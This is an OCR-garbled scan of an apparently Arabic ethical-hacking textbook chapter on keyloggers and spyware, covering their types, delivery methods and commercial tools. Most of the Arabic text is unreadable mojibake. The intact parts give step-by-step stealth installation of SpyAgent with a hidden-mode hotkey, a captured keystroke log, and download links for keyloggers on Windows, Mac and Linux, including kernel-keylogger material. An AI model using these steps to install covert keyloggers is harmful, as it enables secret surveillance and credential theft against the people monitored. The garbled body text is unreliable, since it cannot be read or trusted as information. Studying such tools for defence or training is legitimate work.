j jjIS jjc. cJ^*^ ^Ia^jjojI ^jj ,L_fl jj*-* jjc- lLlIIj cJjU CjLd <j£j Jc AcLaaj 4 ^jjjjud^jll ^<il jj ^ -W^j^ LiAjc 6 Keyloggers 

4^ jjj^IVI ^jJl dAijx-G A\i\\ CjLq jlx-d j-GjJaJJ .LljauJall j-o <JJjuj j A\i\\ CjLq jlx-d <3jjoj JiLd AjJJjk j^al JC- V jj^^l ^ a\\ <Jj3 j-o 
jpj LA JJC. j t^atajVl J jLdJjVl CjlaUaJj tt*J jjjll j tAjjjill JjLojjII j tJRC t^-Jj^jAll AijC. JaL^j j Ajajj^axJ! Jjj^al&ull 6 JjuJI CjLoK 
(J3 <jJajC Ljajl ;SjiLau» dljjjjVl JL^jVI JJC JijJJ jll ^1 ;CjLIjj3! ,^ajJ (JS (JjjLI! (JjS j-d I ^!Llj£ ^JJ jl! djL» jIslxJI 

.4£jJJ! jjc l^iiil U jji^j ^ jl ^jjILJI c_j jjja ^^ijj Keyloggers Keyloggers 
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" drive-by " l!^^ J^U. ^ jl ^ jjj£3VI ajjJI diLaaj* J!>U. ^ ^vim^l ^Ikill Jc Keyloggers ^-o^l t — ^ ^ 
^Ikjj o j^VI ^iilLJI <^j3 jjj jllj jojuS jj ^ Keystroke logger's .£al>^l * j^j^ j^ ^iu^ l ^jL 

Keylogger Jl <-4^ 

cjUUJI Jjj^i j ^tjjlLJ! <^jl J 3 J Keyboard *lj^> Security Flaws jl*-«JI c^ill cad^' 
^3 La jjj^a J 1 . ujujj ^jl Phishing Phishing Jl c — *Oj^ a ^ j^' < s-j j^VI liA ...jj jjj^I J 

JjS (Jjls ^Uaj V tiili Keylogger ^.luiilU J tl^jjl^j* jll diijijyi jl 1 ^jIIj ~ i^Lu^l 

tiUj cJj^j o^>JI <jla Keylogger ^^1^ c^^ 3 .^jW^ J] lW-^I u - * a ^ ^ ^^^^ 4_L*c J Iajj <j| d*. ^A^iLaixJI 

£cxal jj ^jLulLg CjI (j^ J 3 L - J ^^] J] ^ > ^ CjliLo (j* jl 6L_il j <J£juij 1 ^jjaLq Aijst^ qj^ dijjljVl Jc- £yz IgJjjij <J^-^ 

^cjouj Keylogger ^ ^ ^laJI jj^>^ j ^1 JL^L ^vim^l ^jIj Lo*iic. .(Shared Files) ^ ^j^-^l 

4J1aj Keylogger 

(jjS jiJU jl (J^axJ <c.Ula (JlLo ^AkjjauJl JaU^j ^jjJJ ^jll j ^ jl! ^ 4 <JalLQ djljlia Jc^SCreeilSllOt) djUail Jalfijll -2 

,CljL<i jIslaII lA JJC. j tl(g\jir ujj ^aJ ^^jll Cjllulalll ^LgjojI toiaUll ^jjjUc <Jj^ > >n (Jj^ia (JC- (jj^ A^LolaII <Jajaij| ^JJJ ~3 

jll ^jjj^IVI aj^>^I cJ^^jj oj^Ij^II ^jjj^IVI aj^>^I cJ^^j cJ^ ^ ^ j 1 -7 



(Types Of Keystroke Loggers) Keylogger £t jSl 

,4 nt a jj jjj^ ^-jjli^ <^ jj (jjj j ^1 ^A^jjauJI ^j-<i \ ^jj <iaxjja J£ (Jj-^ > >nj ^jIj ^ill j jjt > ^cxiljjj j& Keylogger 

11a j .a^jJJI jjc IgJiJ Ia jji^ ^3 u' Jaliill Jc ftj^Slt l^j^l Keylogger > j^-!l j '^^^i u^j^ j J jj^V^ 

# <J£judj 4_jik-<JI CjUi jlx-<J! Ia jjc-j phrases j^^>^ g ^ <J j^^j ^ > ".> 
^Wj^ 5^ u^VI ojiU ^^i^jj .software loggers j hardware loggers ^ .Keylogger c> 
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Hardware Loggers -1 

J^^j ^ILJI Qii !>L^i* jjfL .USB j*» 6 J-F- Hardware Keyloggers 

^bjlojU ^LA^l^Jl ^aj£j ^aJ 6^ J (Jrt> ^> ^AaajoiaH <Jj3 (j-G 1 ^aJJ ^^jll 4_L^jab<Jl ^JjlLJl dAjJjJa <j£ ^jj^^J ^aJJ .USB 

PC/BIOS Embedded - 



^ <J ' (Physical and/or admin-level access)j^j£^ lsjjj^ 3 c^\^L^ jl/j Jj^jll 

cjUI^)^.! jj^j BIOS l£ j^^q <CLt!i3! ^<il^)JI <jl l_ li^ >*>n ^jj > o <jL^aLaJl s^_^U jii jjj^ll BIOS J l3.-- lSj^^ 

Keylogger Keyboard 

jli^l cs-^ j^)^ j**^ *J3 ?^ 4-i>.>uj^)3l s j^lj ^ " J l^Jj J jll (j^j <^i3l a - a II <jj£li3 ^jjILJI jl 

External Keylogger 

4_i^.j\_^J! jL£ .^tiiixi <iastjja <J£ i l^jl „ jii d^IiIslxJI jj jji^ll ^jjli.^ jl ^ij External Keyloggers 

tAi^i^j jj jl^a. l^iajj A\< , *\ . jj jl^a. ^1 ^ Jaxj j jJI ^ ^1 ^HiJ V (External Keyloggers) 

jl}^ (j-a ^1 jj) ^Hjl . ^filial 1 CjUaxjJa (Jj^la (jc tiL ^aLkll jj jJJ^ti j^-^- diUi jlx-<Jl >±>~aj 4 j£ C-U^ 
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J;i^uaaj .lUs ^ driver's J ^ jJI c> c£' Vj jjujUJI cjUIaxJ ajjuuIU UUj cJli^ ;PS/2 and USB Keylogger 

i^j jjJ^3Vl ^jJt (JjLuij ^—^-^ J 6 Jjj^l ^-jjli^Q 4j*. jj ^j^lLauJl <Jj3 (J-g 1 ^jj ^^jll ^JjlLJl dlljJjJa ^J*?* 

.£cll 'IMS 6<WLaiJl Cjllifkill 4^Jjj]| Cj^Uuujj 

djl jjuflVl Jjj^ ^ s jjis (capturing receiver) Jl^l jU^ H f l^^l <^ :Acoustic/CAM Keylogger 
.^jjLLaII ia. jl cjILU Jj^ i C5 lc Sjjta ^ c _^j3I CAM j' ^Si-all ^-^w ^ * jjs^ 

11a Ciijjj 6^.1 j s . cjjjSjI I c^j ^ tiaia 6^.1 j s lJ^JI jjjjj*£]| jl^ C5 i*i3l Jjj^ajll t .^Wn :Bluetooth Keylogger 

iaJj J^Li. ^gjjAaJl Cji jll J ^JjlLJl CjUaxjJa CjLg jl*-* jIjjJjujI c*I&aJj ^JjlLJl djUjjJa ^ja^ (JJ=»^ 4L_fl^Jl jj jJJ^ti Jc 

s- 3 jSJW jjlj l-jILjj V jj^jLill ^j^l 11a ^Bluetooth Keylogger u^- ^ -^-^ : Wi-Fi Keylogger 

11a .^jjUaII <iasuJa CjU jlstxi jbjiuiV (Bluetooth Keylogger J Jj> > jlg^) J^j ciuiLJI jj jjj*£3I JU^ u-* 

^JjlLJl ClAjjjJa (J^joUJ ^ajll . JJ jJAa£ jl$J> Jc (JasUj SLgLgJ t flJo£A] <JjUj JJC-J drfverS J' ^? ' ; lilaJJ V jj^> J^£^ 

_lajjaa>i ojjj^xi j SjjS (_^j>» cs - ^ C5^J^^V^ (J^O^ 3 U^ 0 <*— ^ jl*-all J-^JL? 

Software Keystroke Loggers -2 

(Jj^ i oj] L_flj^JI jj* jjj>^3I jt$j> J ^jjj^iyi ^j^t c3^^ ^-^f^ j^ ^ ^jjjjj ^jj (jc- sjW^ Loggers ^ ^ 

Sj^^V L-jL gall (j^aj£3! ^ (J^joJI t flip <JiL<j ^ La i oaSI dlLa jIslxJI ^jj j^J ^aJJ IjA .^JjlLJl 4_a. jl Jc 1 ^jjlj£ ^JJ ^JjlLJl djUjjJa ^Ja^. 

jjjjII jjc CjUIjjII Jc (J jj^^Jl ^aJJ <jV <iaxjJall diljljj Jc <J ^aJ] j^>^ uJI ( . ul a ^j-d ^jUJI J jj^ jll L_J jlla-d jjc. . jj jJJ^ll 

tUiajl AjflLJa! djUljj ^J^c. J jj^a^JI Sj^SlI Ajji {j-p*^ jjj^ J Software Loggers .^Lj Sjjj^ djljja ^ jjj^IVI 
.^Ijji ai^ Jj Software Loggers < %u^j ^jj .Hardware Loggers aj^UII SjSlill ^^j^kj Jja ^ j^jii V tiij^ 

Application Keylogger 
Kernel Keylogger 
Rootkit Keylogger 
Device Driver Keylogger 
Hypervisor-based Keylogger 
Form-Grabbing-Based Keylogger 

Application Keylogger - 

Loj tCjlijjIajll (j* Ia jjc. j t^LJjjjjJIj t^jjj^lVI ^jJ^ cJ^^j - ikludAll <jj£j Ui (JS <jal jaj till ^&jujj Application Keylogger 

A£jjoJI ^V^J J£ Jj> > uJ j ^JJj] LaLaJ ^J-* J^C. jA .dljjjjVl iaUjdj dj!>L^jaj ^Jjj* <fc5 J^- <^V^ a J l^A ^ . JJ^>^^ c — ^ ^ 

Kernel Keylogger 

(j* ^ jjll IjA I^LuiaSI ^-^J CjljjJiajj <Jjou31j <j^Lk. 44iUjjj£l L-Jju aJ j^a t^UlUj .JjjJ^ll/Sl jjll ^ jlm^ ^^ic jj^. J^J^^ Aa. jj* 

,^jjILJ! <ja. j] ^^ic <jjj£-<JI CjLa jIslxJI ^j^^ ^j <J jll L-Loil^Q (_3^j ^IjIIjj t^jj'lLJI j] ^ (Jjxjujj £c-g!jj l!^ cJ-**^ j^>^ J^J^^ 

Rootkit Keylogger 

^Uajll (> ^^j jj^ jLSII 11a .^jjUJI djUj^ia J£ J^uj ^ill jj jj^j jU^ J^-^ Rootkit-based Keylogger 

A Cj\ jjVI j) <jjoalji3l CjI jjVI ^ t q/^ti <jAa jjc. j 

Device Driver Keylogger - 
Jii^ ^ij _4A A jaAll Keylogging ^i^j ^ i/o driver <J^ J^h .Device Driver^ ^jIc Jaxj jj^jl£3l ^ ^jj^l liA 

^likj ^aJJ .dljjjjVl 4£jjui j!>Lk J^^ ^j ^ M i " jj ^aJJ ^aJ (j>»J O 1 sIa <J J^.jll Jj^jouI JJ jJJx^ll ^^ic ClJj^.1 ^^jll ^JjlLJl 

^ljj| <fc5 J^- tJjXJujjll ^aUaj ClalaLo IA JJ-GJ L-J3U aJ l^jlj I^A jj^- J^^^ ^JsjujI jJ L— lJj£ C5^J J^^ C5^) ^ ^ ' " jj r*^ ' 
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Hypervisor-based Keylogger - 
lU^ ^1 ^Ln^JI Hypervisor jt t>^ (Hypervisor-based Keylogger) ^ ^ 
. (virtual machines)^** jll J^Jdl Jl* .1^1 J U^u^ <A\ 
Form Grabber-Based Keylogger - 
a^jSi! axj ^ Vjl Cij j^VI a<^A l_ijj3I g-iUj cjUUj ^Forrn Grabber-Based Keylogger J 

jjjL l^j]! g-i cj^LkA^ Jj?^4? f 'Form Grabber-Based Keylogger .HTTPS JjW^ ^ ^ j^V^ 

_<illa jll (Jjoij Jc <Lajta3l ^jjL^aJ Jj-> > uJ 



(Methodology Of Attacker In Using Remote Keylogger) ^ Keyloggers j»t^aa^t ^ jj%JI 
AjauJal] c_aL3! I1a JLoj jjj (malicious executable file) V jl ^ j£j ^W*^ u° lP 3 j*^ 

^AkjjaixJl ^l^k <illi JJC. jl ;(< ; llc.| jl JlLd t^fljka t flip s-ljj jUia L_aL» s-liiJ ^1) ^jjl&lVI LS^^ 3 

\ ^JJ 4-lasLjJa <J£ J ^ajL} Keylogger .^J^ 1 ^ 4_1juu31j J^C. Ljajl <j| Lg£ ^aUaill Jc ji^^ 2^^^ CllIJJJ <j| 

djULai^Jl ^ > J > ^—3^ J^*-* <J> c *\a AS . <J^juJI c aLo jl ^ > ,Vi c flLa J] 1 g laiaJ ^ajli ^aJ Ijjuj ^Vlm^l <Jj3 




Send it 
to a remote 
location 



Saw it to a 

i. K l.li- 



Hacker 



•m.mww 

malicious file 



oil a keyboard 
PASSWORD 



Keyboard 
Injection 



Driver injection 



ImmI I njettlon 



UEinjj i£(GetAsyiiflksyetatfi 



I , i i> i [ i i'i , iYi'i'i;i'. BBIIH ^ 



IN 


1 t 


□ 


* 







Applicption 



Application 



Driver 




User 



Keyboard 




Windows Kernel 



Acoustic/CAM Keyloggers 

<^ jl J£ ^ j^J^ I^a .A^jauJaUx^ ^-j^^j <^ j^3^ J^j^ Acoustic Keyloggers 

Jjj^il cj! Vit > ^ 1 ^> jl 1^000 c^j^ "learning period" t> The acoustic Keylogger 



L_flj^JI lP 3 *^ f ^ iaJLuj| ^jj i o <jV ^Ui^ cJ^ ^ ~ laJLujj c^^l ^jiill ^jjjLojI ^^ic - ^>^yi cjUUJI acoustic Keylogger 

^jiilLJl djlj^jja djUail iklj Vin^l Ijj^l^ll ^ Jail lLu^ .^jjILJI djbjjja Jj-> > Ij^l^ll ^al^klojl J*^j A CAM Keylogger 

.CAM Keylogger cia ^ l^JU J ^ ^3! CjIUI 
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Acoustic Key logger 



CAM Keylogger 



Etectromagn 
-etic Waves 1 [ (o 



User 



Capturing 
Rece iver 



Typed 
Alphabet 




Camera 



Takes 
Screenshot 



Transmit to 
***••♦_ the Hacker 




Hacker 




User 



User Press r A r ' 



User Press "A" 



Keyloggers 

l^l^kiujl Aft dj ^jJt j lsj^ Jj^- cill^i ^acoustic/CAM Keyloggers l^i^U* ciuj ^1 cjU jlx^ll l-uL^j 




PS/2 Keylogger 





Keylogger embedded 
inside the keyboard 
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Keylogger: Spytech SpyAgent 

http ://www. sp ytech- web . com : j^-a^ll 
^j* ^^klauJI jj jjj^ti ^jjILJI CjUjjja till ^joij (^ill j ^jjILJI ciiUaijja Jj-> > >nl ^Ujj j& Spytech SpyAgent 

j^^jjouJl jj j.Ua£ jl^. ^^ic Ajlljlt JJ-^VI 4jSI^>aJ cill ^--<u.nJ <jl Ij^ajl (j^J .^Jc- 

.CIajjjjVI (^g-lc diiaj c ^j3I l— l^ali CjUIac ^.j.aj> >>n 
.^l^kloaVl .liS CjllniaJ*llj £L*I jA\ ^ La 4jSI j* 



.(uploading) ^jl^ ^ ji (downloading) <J^3lb ^ ^wim^ l ^ 

,4-Jjjuall ^^JjoiaII JjuJI < ** & &l£ t 
ajl! $.Aj JjjS jijl Ja£3 tilli AxJj 6<Jjal j* .JJjJ <_£,j]l JJ jJJx^ll ^^ic AjJJJJ j ^^^jojjII £fj j-oll (j-a ^xiUjill l^A (Jja^l c*1j£ 

. JJ jJJ^ll (^Ic ^JjkjjauJl JaLuU <J j^. till <Jjou11j JJ-aVl (j-a J^C (J^jujJ L_fl jjoj j ^^^^joi 

lujjjli ajLac. ^j-<i <1^.jaJ! ^1 <Jj^j cjt^ 1 ^-jl^u (j^aLkll Wizard l^^A 3 a-Aac. Ijjj -\ 



Select SpyAgent Installation Type 




Click the type of Setup you prefer, then click Newt. 



(* Administrator/! ester 



Program will be installed with the all software 
options - and accessible via Windows start menu. 
This is recommended also for new users' Help 
documents are installed. 
C Stealth Installation Program will be installed with minimum required 
options and no shortcuts included in Windows 
start menu. Also HELP Documents are NOT 
INSTALLED. 



Space Required: 304S K 
Space Available: 31 81 728 K 



I 



J 



J 



j\ J^j Next (jj* Administrator/Tester CujSsII <^ t> ^ jA\ ^ ^ -2 

Spytech SpyAgent Setup 




JjjLjII j^-ki ^j CjjjjjII aA*c c ^1jj Close i3j* U^j ^ j* cjt^ Next Yes c3j^ -3 

l^Vl^ jjj-^1^ <-<^ JLk^l t . il kj ^^jll j ajJUJI <jujLuJI j^-k ^5^. continue cjj^ j ^jj^jVI 



Old p-as sword: 



r 



r-J F>a s swa rd = 



"This password restricts other users Fro n 
changing the SpyAgent settings. 



L 



3 I- 



as 



;aj11j1I ^I^cVI ^JjUi j^-laj ^5^. Continue c3j^ ^ ^ jjj - ^^ ^1S iklujl ^^-^ ^jf^ aJLujj j^-laj* -5 
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1 . Configuration 

2. Extras 

3. Confirm Settings 
4-. Apply 

5. Finis-h 



Please select a configuration package 
from the below options. 

£*" Complete + Stealth Configuration 

Configure tm run in total =■ t-= = I th , i th all possible 
logging options p rec o n Fi g u red . 

(~~ Complete Configuration 

Configure with all possible logging options 
p rec o n Fi g u red . 

Typical Configuration 

Configure with the most commonly used logging 
options p rec o nfig u red . 



L 



j 



ajLc a!^jA\ fi Next <ija fi Complete + Stealth Configuration 4JL&\ ^ JiLk -6 

Finish ^ Next c3j* j& fi Display Alert at Startup cjI jlrk <c jlikj jI^cVI 

(jjjWill ajjoujjII <j^L5JI (J*** Continue <jj* j^" lsj^ Finish <jja j ^tac-VI ^ ^L^Vl aju -7 




computer monitoring and surveillance software 



9 



Click Here for 
Ordering In format ion 




_©G£)G(Hil]®^ — i ; Program Options h Log Actions h Reports i Help 

.Start Monitoring c3> ? <*\*1\ ^vim^ l iat£> -8 
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.Ctrl+Shift+Alt+M o> j^l c> ^ Stealth mode J\ J^VL eJ £ J£ Ail ULSi\ -10 
.Continue tij* j*^ j jj*^ 1 ^ ls-^jj <^Ij JU^' j '-^ ok lsj* j*^ f j*j-l 1 

. Ctrl+Shift+Alt+Mcba jail oc Stealth mode J^-U ^^^f 3 ««iSjSjVl ^ jVI -12 

<j ^13 U o^a^xj jjoj Keystrokes Typed jW^W f ^ jl j*^' lV (* ^ >> 1 ^ ^ ^ ^ ^jjj^ -14 



SpyAgent Keystrokes Log Viewer 


- 13 entries 






O Save Log [g) Save All *J Clear 


J Format J^J Actions... 


Jump to Log... 


Select a Keystrokes Log Entry 



Application 



| Window Titl 



sername 



CEH vS Labs Module 05 System Hacking.pdf- 
NewTab - Manilla Fi ret ox 


Adobe Aero... 


jana 
jana 




CEH vS Labs Module 05 System Hacking.pdf - 


Adobe Aero... 


jana 




no title 




jana 




no title ( ] 




jana 





Acrobat.eoci 
firefox.exe 



Acrobat.exe 
explorer.exe 
* sysdiag.exe 

Keystrokes Typed 



Man 5/L9/L4@ Ll:22s05 AM 
Man 5/19/14 @ 11:22:26 AM 



Men 
Hon 
Men 



5/19/14 
5/19/14 
5/19/14 



@ 11:25:29 AM 
11:25:35 AM 
@ 11:25:37 AM 




[Alt]Tt€Dd ^ .jfBackspacerv ^i^^nrjjV^^, ^ =an ^ [Alt] [Caps Lock]£[Caps Lock]tealth 

ma d es[B a ckspa ce] [Alt] ^ ^-^[B a ckspa ce] [B a ckspa ce] [B a ckspa ce] [B a ckspa ce] 
[Enter] 

[Ctrl] [Ctrl] [Alt]^> j [B a ckspa ce] [B a ckspa ce] [B a ckspa ce] [B a ckspa ce] [B a ckspa ce] [B a ckspa ce] j= 



• [CtrO- jje^ [Backspace] [Backspace] [Backspace] . 



—•j ja^li ^ jjjjJi ^s[B a ckspa ce] [Backspace].^ [Alt] [Caps Lock]Q[Caps Lock]k[Alt] 



■Tl-HSim-lJhrVI j J. J,^ >^ ^ ±iH n it ~ fiji 



Note j Log entries preceeded with a 1 



indicate a password entry. 
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Keylogger: All in One Keylogger 

http://www.relytec.com : j^-a^ll 

^vim^l iaUij J£ ^ j ^iilLJI CjUjjja Jj^uolL till ^joij ^ill j <^j^ j^c- jc. jK ^Ujj j& AH in One Keylogger 

CjULlu^JI UjUIj (J^joill daliLo ^^aljjj jj jj;^^ ^a.IaJLui* £J*^ (j-a a U.VAfi ^ia^J Ijjuj £fiilU (ill ^ajujj . jj j-Ua£ll ^^-Sc 

^l^kjjajU aJUII ^UJjVI J*-* .LaLaj* C5^^ J^* uj-^j Windows lS^*-*^ •^ c - Ujliti ^joiij jc. jK .email/FTP/LAN 

;^»Ujill 

. ((J?* uid ^jjILJIJ ^jjILJI CjLjjJa ^<^. ialiiill -1 

,4_Jjjill JjLaljll JjI^juJJ -2 

. J^jjJajli a I laJLujI -3 
■ L&all ^clajui JaUij Jalilill -4 

.(Capture Screenshot) s^^t ojj^ Jalisll -5 

,<J^ Mill dAiLa ^ ^jjjuoII i_ laoll -6 

.^i.^tj <FTP 'c^JJ^V^ AD**' j^j^ J^>j] -7 
■uj^jj^..^ ^ cJj? ' ^ -8 
.HTML jaJS3*L53l -9 
. anti Keyloggers d^u -10 
l_j jc. j>» lSj^*** - 1 1 

.FTP jjjlii JL-j)-13 
.HTML jij* JL- jj -14 
.l^jfl j^-^ £^ dMj^ c ' - 1 5 
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Keyloggers for Windows 

dAjjjJa (Jj^ i all CjIj^VI £>i& ft^lilLuiVI ^(jjjaJl 4_^ll<Jl jc. jK dAja ^j; c^IUa ttLLuj jc. ^jjuj ( ; a 

; Jj±Lj JJLuuil ^Uaj { J&* J^ju ^Hil jl£ 4ajV UA iaJL n 

Ultimate Keylogger available at http://ultimatekeylogger.com/ 
Advanced Keylogger available at http://www.mykeylogger.com 
The Best Keylogger available at http://www.thebestkeylogger.com 
SoftActivity Keylogger available at http : //www. softacti vity . com 
Elite Keylogger available at http://www.widestep.com 
Powered Keylogger available at http://www.mykeylogger.com 
StaffCop Standard available at http : //www . staf fcop . com 
iMonitorPC available at http : / / www . imonitor gc .com 
PC Activity Monitor Standard available at http://www.pcacme.com 
KeyProwler available at http://www.keyprowler.com/ 
Keylogger Spy Monitor available at http://ematrixsoft.com 
REFOG Personal Monitor available at http://www.refog.com 
Actual Keylogger available at http : //www. actualkeylo gger . com 
Spytector available at http : //www, spytector . com/ 
KidLogger available at http://kidlogger.net 
PC Spy Keylogger available at http://www.pc-spy-keylogger.com 
Revealer Keylogger available at http://www.logixoft.com 
Spy Keylogger available at http://www.spy-key-logger.com 
SpyBuddy® 2012 available at http://www.exploreanywhere.com 



Keylogger for MAC: Amac Keylogger for MAC 

http ://www. amackeylo gger. com :j^JI 
^ c ^Jj J£ I jjoj J j-> > «\\\ t*lLa (jjjjud^jlU t*U ^joajj t*lL» Jj «juS j1I Ls lc j^-jK Amac Keylogger 

:4_i3U3l *UjuaVl J*ijJ 

m dA in'ql ikl j ^£1 ujj 
.^jjj jjj£Ui <ja!^13 jp <jl jjc (Jj^ > >n 

.(JjXjoLaII p^J Aio IjjoJ Ijjlllj (JxjuJJ 

cj! jja ^ email/FTP cj5LuJI JL* J 
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Keyloggers for MAC 

d^Aj _ ]V[ 2i C (J^*-"-^ ^ ^aliaj ^^g-ic (J-a*J m jP> ^liAxJl 1 \ <aJI tilldA (Jj»-uiill lai] A > ^ all ^)C- CA SA^aJ (J!La 

Aj^aLaJI £3 1 j-<Jl IfrllA^J aJ _ ]V[AC OS*— j2 jj;^^ ^»Uaj ^^ic ~ I^JLuiaII JaLutJ Aj^jj t^JjlLJl dAjjjJa (Jj^ i «~ ^^Jc (il^cLaaJ 

;Mac OS » fUad jc. jK fhvU csI^Saj 
Aobo Mac OS X KeyLogger available at http ://www.ke ylo gger-mac . com 
Perfect Keylogger for Mac available at http://www.blazingtools.com 
Award Keylogger for Mac available at http://www.award-soft.com 
Mac Keylogger available at http://www.award-soft.com 
REFOG Keylogger for MAC available at http://www.refog.com 
KidLogger for MAC available at http : //kidlo gger . net 
MAC Log Manager available at http : //www.ke ylo gger. in 
Logkext available at https : //code . goo gle . com 
Keyboard Spy available at http ://alphaomega. software. free. fr 
FreeMacKeylogger available at http://www.hwsuite.com 

List of Linux Key Loggers 

LKL -1 

http://kaz.dl.sourceforge.net/proiect/lkl/lkl-0. 1 . 1/lkl-0. 1 . 1/lkl-0. 1 . 1 .tar.gz 
a^j] iiia J!^k jai J£ J^ij jiii i aij LKL .linux— x86/arch ^vim^ l Aiu Ja*j j^jK y> LKL 

Log Key -2 

http://logkeys.googlecode.com/files/logkevs-0. 1 . 1 a.tar.gz : j^-a^ll 
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<j£J j ^uberkey j LKL V t^liall (jAiJ j£ jK ^ U jj£ j-* U^ii ji&l -L >Aiil3 <j-aj^a^ j£ jK j& Log keys 

.£tJjtj cJ^^ ^ J-^'J t*vV%, i 

Ttypld -3 

http://kaz.dl.sourceforge.net/proiect/ttyrpld/ttyrpld/2.^ 
.ciL ^j^aLkJI si jj TTY l>* ^ Cy* 4-^^ (J&\ ^— >UI j^VI j jjj-* Jj> > ^.v^uhj Ttyrpld 

uberkey -4 

ftp://ftp.nz.debian.org/freebsd/port^^ : j^-a-JI 

Vlogger -5 

http://www.thc.org/releases/vlogger-2. 1 . 1 .tar.gz : j^-a^ll 
Simple Keylogger Python script -6 

http://kaz.dl.sourceforge.net/proiect/linuxkeylogger/keylogger.py : j^Jl 

https://www.thc.org/papers/writing-linux-kernel-keylogger.txt 

Hardware Keyloggers 

^tiilLJI cAjjjJa J j> > qjj ^ul^klojl ^jj . jj j ^ x l l l j ^jjILoII 1 gJj > ^ jj ^jj 6 (jc ojUc Hardware Keylogger 

Hardware s jSti ^ciilLJI <^j3 CjUaUij ^.i^ J j-> > > n Hardware Keylogger ^ikluuJI 

^l^viml dj „ jj jjaa^II cJ^xjujj pAj (j£-<ui difl j ^jjILJI ciaUaxjJa lg La > >n jc. cjllulaj Jc Keylogger 

B t*Sa|jAl <jjSa^l ajjVI Hardware Keylogger 
KeyGhost ^ 

http://www.keyghost.com : j^iJI 

jW J£ f j*j ls^'j (tiny plug-in device) s j^-^11 cjUjSJI cjli jAKeyghost 

^bjlujl jl ^jjILJI dAjjjJa Jj^jouI ^cxaljJl (j-a ^1 lIjjjjj] ^ll^J V tttiaall CjI^j^x* Cli^Jl 

_ jj* jjj^£ Jc djUi jlx-<JI ^LajlajV j^.1 <lij^a jj* j (unplugged) cl>^ ^'^ 

J Jj| ^0 ^| a iklLuJj V 



KeyGrabber ^ 

http://www.keydemon.com :j^JI 

6jj>j^a jj^^ J j-> > » n 6j^l .USB j» PS/2 ^Ijjuj ^tiilLJI ^ jl ^ £&jjILJ! djUjjja J j> > > nj ^ ^xujjj jl^j> KeyGrabber 

j^. J HDMI ^DVI ^VGAc>^^ j^V 1 
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KeyGrabber 

Haidware Keylogqer 



Now 14* 





fitet«P Security g 



T «wO«c Siom^rM JUftilMrt SX 




**«yGiiost 



com 



Spyware 



'AIM 'AOL 'MSN < ICQ jjj* <-J£/J ^ <J ^) ^i^i^ J£ A£ jbj c^i ^1 ^1 jA\ 6g j jjSWI ^J^ 
i&a^ a Cjljiia ^^ic CjUail Uiajl iku .ciijjijVl C5 ic ciitjjL^ j &cjULaaJl c kL> 4 (Webmail j» Yahoo Messenger j 

4_ijL^ ^c^l^JI jl A-ijl a &1I ^c^l^JI o (jj^ Spyware uj-^ ^ . j2 jj.^^ <jujUjdj s^ujU* 4_L^l<J! <jS!^<JI Ij^l^ 

u^-^t gc^tj^ jU^SjI Spyware Propagation 

^j^xui j ^ j^l jj C5 ic (Jjjjuo^jII ^1 jj " piggybacking " 0* ^-aIc ^vim^U <j-aLaJt jl j^<&\ \ ^^Jc- 

jj jail djUill ^ 6^.1 j ^ ^1 j 1 (advertising cookies)^^)^ ^£ J*^ ^J*^ ^ ^" >> n (j m^M I jj ^jV 

.^jjjilVI ^^31 ^ " drive-by downloading" uW^I 

^Vlm^U ^aLkll jj jjj^ll jl^A ^^Jc l^-La ujJ j (jnmV^I 4 ^ si ^ a JlLd CljjljVl A^Jjai cJ^-^- (j- 0 (jnm^Ml 



Drive -by down 

Masqueradi 
anti-spv 

Web brow 



vulnerability ex 




Iced software 



r add-ons 
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?What Does the Spy ware Do <j nniVifl <l)i 6^ (g&\ 

Jail jj jJi^I] Ajjjuu* 6Jj5S ^LlujI Jjtij <jl tilj£ aJ ;4_i^jJall jj jjjya£ll ^ Jc (jouui^jll CIiijjj ^L^J jj^aj 

- tali JJ CS - ^ ^V*^ (jjjjud^jl! ^cxal JJ £x» 4_l3tj3l JJ-<*V1 (j-a 

.hijacker j> ■^j J] IgJL » jj j uJI ^jj^j^jLuiaII CjU» jl*.* 4ijjui 

ClljjJjYi Jc- ^LqA^LolaII -laLuij j-o 
. dllj^lc- V I £Sl ClljjjjYl ^Aj^ald jj Sjlcjj 4j*X« j^ll <alnl<Jl iil jjll (jlajc 
.<Jjlxluj| > I^JLuiaII £J-*J ^t^J^ ^lAjqI ^^jJaljjaYI jljC-YI JJJ*J 

.<jjjj*J| ^jjjjud^jll Jj ( . ^Sajoi dll jL^lkl j 

.axj <> ^UV! £s\j*!L JL^jYI - 

■ t "^ ^j;^ jljSJjoil ^aJC Uiajl t ; UjujJj ^Uajll s-IjI ^paJ&aJ 
/ a^'i.^ ^jjj^IVI .JJJJ J^J^ 

■ g^aial l J^ j (dll) dynamically linked libraries c_AiLll Jjj*j 

.AjLa^JI jl-^J> dlLljcj jjjaj 
.l-aj^JI Ia jj jj jll ^1 jaII (jc jjj^sj 4jIj£ j .J-^j 

(TYPES OF SPYWARE) u-*"*3M g-lj* fcljH 

JaLulj (jC CjU» jIslxJI <3jjoJ 1 g ^ ikluJj (jl (j£-*J jJl dljjijVI 4£jJuJ Jc« (J-GJU jll (JoUud^jll JJ (j-a 4_LallJj ^1 jj| JO 

;aJU3I ojjojlSI ^1 jjVI Jj Loja j .4jajx-G j Ajial j* ^jjAj jj jjj^I Jc- ^jj^jjuuJI 

1. Desktop Spy ware 

2. Email and Internet Spyware 

3. Child Monitoring Spyware 

4. Video Spyware 

5. Print Spyware 

6. Screen Capturing Spyware 

7. USB Spyware 

8. Audio Spyware 

9. GPS Spyware 

10. Cell Phone and Telephone Spyware 

Desktop Spyware 

£L<^. jl ^vim^l <iajaul <J j^. djUi ji*-<i Jc <J jj^^JI ^1^.1^13 ^L«ft.t.nj ^dUjj jA (Desktop spyware) t . y&*\\ (jnm^i jj 

. J^j ^(Desktop)^^ J^ a£jj^3I ^^klu^ 

; Jj La jfiHj $ *W ^-AiuJ < j^oll ^Jouj iAj jujIjj 

,L_jjjjjVl cJjj> > >n j <jalj^ -2 
_c_jja jj3U l-jLi^jjII ^Ijjkjjojl Jj^jojj -3 
.jjvIj ^ j£ j^ ^ij^ J Igijjj^jj (activities logs) -lal^ull cjUL Jj^j -4 

https://www.facebook.com/tibea2004 AjjIs ^^aa^a 



416 



Desktop Spyware: Activity Monitor 

http ://www. softactivity. com : j^-a^ll 
C5 l<i j n aj£ j tLa (jUij ^Lj^aflj djLi jIscaII cililaxj Uui ^LAN ^ ^^jII staVl Activity Monitor 

jl^. ^^ic Activity IMonitor (> *\"*" .lS^*-^j ^IaJI Cy* ^-^^ I^a (Jj^j .a£jjuo3I ^^ic a£jjoJ! ^ ^ i^iLu^q 

